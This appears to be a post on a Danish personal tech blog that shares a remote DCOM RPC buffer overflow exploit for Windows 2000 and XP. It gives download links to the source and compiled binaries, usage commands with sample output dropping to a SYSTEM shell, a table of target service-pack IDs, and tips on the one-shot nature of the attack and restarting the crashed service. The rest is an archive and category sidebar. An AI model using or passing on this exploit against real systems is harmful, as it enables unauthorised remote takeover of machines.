Files: Source: http://base.fujang.dk/files/mike/dcom.c (include <error.h> removed) Freebsd binary: http://base.fujang.dk/files/mike/dcom Windows binary: http://base.fujang.dk/files/mike/dcom.exe + cygwin1.dll The windows binary is compilled by padde (www.beastie.dk) modifications has been made to make it compile under cygwin, the source file avail here was not used to compile this binary. Windows usage: C:\>domc 0 192.168.10.123 --------------------------------------------------------- - Remote DCOM RPC Buffer Overflow Exploit - Using return address of 0x77e81674 - Dropping to System Shell... Microsoft Windows 2000 [version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32>whoami whoami NT AUTHORITY\SYSTEM C:\WINNT\system32> Unix usage: bash$ ./dcom 0 192.168.10.123 --------------------------------------------------------- - Remote DCOM RPC Buffer Overflow Exploit - Original code by FlashSky and Benjurry - Rewritten by HDM <hdm [at] metasploit.com> - Using return address of 0x77e81674 - Dropping to System Shell... Microsoft Windows 2000 [version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32> The leading zero must be set to one of the following, and describe the target system. - 0 Windows 2000 SP0 (english) - 1 Windows 2000 SP1 (english) - 2 Windows 2000 SP2 (english) - 3 Windows 2000 SP3 (english) - 4 Windows 2000 SP4 (english) - 5 Windows XP SP0 (english) - 6 Windows XP SP1 (english) Thoug it says english, i have successfully tested this against several danish versions as well. You will most likeley have only one shot at this one because the vuln. service will crash after one try. Also after successfully exploiting this you wont be able to exploit again because the services craches. For more information, read the source. Looks as though the service continue running during the shell, to restart the shell type : net start rpcss , wont help you to start this from the shell, gotta be done afterwards.
-
Seneste indlæg
Arkiver
- januar 2024
- december 2023
- november 2023
- oktober 2023
- september 2023
- marts 2023
- oktober 2022
- september 2022
- august 2022
- juli 2022
- juni 2022
- maj 2022
- marts 2022
- februar 2022
- december 2021
- oktober 2021
- september 2021
- august 2021
- marts 2021
- maj 2019
- april 2019
- januar 2019
- december 2018
- november 2018
- oktober 2018
- september 2018
- august 2018
- juli 2018
- maj 2018
- april 2018
- marts 2018
- januar 2018
- december 2017
- september 2017
- juli 2017
- juni 2017
- april 2017
- december 2016
- november 2016
- februar 2016
- januar 2016
- december 2015
- september 2015
- august 2015
- april 2015
- februar 2015
- december 2014
- september 2014
- august 2014
- juni 2014
- april 2014
- marts 2014
- februar 2014
- januar 2014
- november 2013
- oktober 2013
- september 2013
- juni 2013
- maj 2013
- april 2013
- januar 2013
- december 2012
- oktober 2012
- september 2012
- august 2012
- juli 2012
- juni 2012
- maj 2012
- maj 2011
- marts 2011
- februar 2011
- juni 2009
- maj 2009
- marts 2009
- december 2008
- november 2008
- oktober 2008
- august 2008
- juli 2008
- juni 2008
- april 2008
- marts 2008
- februar 2008
- januar 2008
- december 2007
- november 2007
- oktober 2007
- september 2007
- august 2007
- juli 2007
- juni 2007
- maj 2007
- april 2007
- marts 2007
- februar 2007
- januar 2007
- november 2006
- oktober 2006
- august 2006
- juli 2006
- juni 2006
- maj 2006
- april 2006
- marts 2006
- februar 2006
- januar 2006
- december 2005
- november 2005
- oktober 2005
- september 2005
- juni 2005
- maj 2005
- april 2005
- marts 2005
- februar 2005
- januar 2005
- december 2004
- november 2004
- oktober 2004
- september 2004
- august 2004
- juli 2004
- juni 2004
- maj 2004
- april 2004
- marts 2004
- februar 2004
- januar 2004
- december 2003
- november 2003
- oktober 2003
- september 2003
- august 2003
- juli 2003
- juni 2003
- maj 2003
- april 2003
- marts 2003
- februar 2003
- januar 2003
- juli 2002
- juni 2002
Kategorier
- Android (1)
- Ansible (1)
- Apache (53)
- Backdoors (3)
- Backuppc (1)
- Blog (2)
- Cisco (2)
- Development (1)
- Domain Name System (3)
- Exploits (4)
- FreeBSD (64)
- Hardware hacking (2)
- HP (1)
- HTML (2)
- Humor (10)
- I3WM (2)
- Intrusion detection (1)
- IRC (5)
- Irssi (1)
- Javascript (1)
- Knowledge Base (623)
- Kryptering (6)
- KVM (4)
- Lamp (5)
- Letsencrypt (1)
- LifeHack (2)
- Links (30)
- Linux (251)
- MobilPhone (1)
- Monitoring (3)
- Mysql (6)
- Nagios (9)
- Networking (152)
- Old Base (529)
- OpenBSD (4)
- OpenVPN (3)
- Opskrifter (1)
- OsX (1)
- PHP (12)
- Postfix (1)
- Programmering (50)
- Python (5)
- Retro hardware (2)
- Security (13)
- Shellscript (7)
- Sparc (1)
- SQL (24)
- SSH (9)
- Uncategorized (40)
- Vagrant (2)
- Videostreaming (1)
- Vim (7)
- VNC (1)
- Windows (23)
- Wordpress (3)
- Workstation (28)
- xcp-ng (1)
- Zfs (1)
Meta